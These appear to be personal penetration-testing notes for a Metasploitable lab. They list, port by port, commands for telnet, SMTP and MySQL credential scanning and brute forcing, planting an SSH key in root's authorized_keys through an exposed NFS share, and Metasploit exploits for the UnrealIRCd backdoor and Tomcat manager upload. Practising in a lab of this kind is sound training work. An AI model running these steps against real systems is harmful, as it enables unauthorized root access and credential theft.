auxiliary/scanner/telnet/telnet_login
### Need to use Wireshark to inspect login credentials
ncat <ip> 1524
Port 25
# SMTP
auxiliary/scanner/smtp/smtp_enum
## Veryfying the users available on the internet
nc <machineIP> 25(port SMTP)
VRFY <username_Enumerated>
Port 53 ISC BIND (DNS)
Port 53 is used by DNS (Domain Name System).Berkeley Internet Name Domain DNS takes care of recolving human readable 'host names' into numeric IP addresses. A commonly used DNS server called BIND has had a rich history of security problems. As a result, BIND and port 53 are frequent targets and a couple worms used BIND exploits to propagate.
It is used to host the DVWA on the metasploitable OS but it also can be exploited.
nbtscan -r IPrange/24
dirb <ip>
http://<ip>/phpinfo.php
msf6> auxiliary/scanner/http/http_version
cadaver <website>/dav/
# A Linux terminal should pop-up
PORT 111/ 2049 RPC Bind
RPC - Remote Procedure Calls NFS - Network File system
rpc info -p <ip>
sudo mkdir -p /root/.ssh
cd /root/.ssh
### Generating SSH keys
ssh-keygen -t rsa -b 4096
### Mounting the filesystem
mount -o nolock -t nfs <ip>:/ /mnt
### Listing the filesystems
df -k
cd /mnt/root/.ssh
cp /root/.ssh <filename> /mnt/root/.ssh
### To make ssh connection we need to extract the ssh authorized
key pair into the known authorized file
cat <publickey> >> authorized_keys
ssh -i /root/.ssh/<file> root@<ip>
auxiliary/scanner/mysql/mysql_version
auxiliary/scanner/mysql/mysql_login
# On bruteforcing we get the password
mysql -u <user> -h <ip>
### Some Mysql Commands
show databases;
use <database_name>;
show tables;
describe <table_name>; (Select query)
service postgresql start (IRC Requires a server to communicate with)
exploit/unix/irc/unreal_ircd_3281_backdoor
### IRC was built to prevent flooding
Show playload
set payload to ruby
Port 8180 (Unknown)
Port 8180 is used by the Apache tomcat service to run the java codes on the go....
Default password list github for apache tomcat based logins
exploit/multi/http/tomcat_mgr_upload
